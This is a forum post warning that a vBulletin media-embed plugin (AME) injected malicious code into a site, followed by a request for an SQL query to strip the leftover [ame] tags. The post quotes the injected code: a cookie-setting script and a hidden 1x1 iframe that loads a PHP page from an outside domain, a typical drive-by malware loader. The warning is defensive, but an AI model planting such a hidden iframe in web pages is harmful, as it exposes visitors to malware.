Thread: Major Additions - AME 2.5 - Media Embedding for posts, sigs, vm's, groups and blogs
View Single Post
  #1402  
Old 10-30-2010, 02:39 PM
ShackMaster ShackMaster is offline
 
Join Date: Apr 2006
Posts: 252
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
BEWARE OF THIS PLUGIN! We believe we had a vulnerability using the AME (Auto Media Embedder) product/plugin and have removed the plugin. We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Code:
<script> function SetCookie(cookieName,cookieContent){ var cookiePath =
'/'; var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000) ; var
expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
} SetCookie("hsmsdn", "turk"); </script> <iframe
name="1" width="1" height="1"
scrolling="no" frameborder="no" marginwidth="0"
marginheight="0"
src="http://www.chekolkal.co.cc/felk.php"></iframe>

Of course we got several warnings from Google who was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URL's prior to removing the product, but it would not work. We have removed it, but now those posts have the [ame] tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and [/ame]?

Thanks!
Reply With Quote
 
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01048 seconds
  • Memory Usage 1,765KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD_SHOWPOST
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_box
  • (1)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit_info
  • (1)postbit
  • (1)postbit_onlinestatus
  • (1)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • reputationlevel
  • showthread
Included Files:
  • ./showpost.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showpost_start
  • bbcode_fetch_tags
  • bbcode_create
  • postbit_factory
  • showpost_post
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • showpost_complete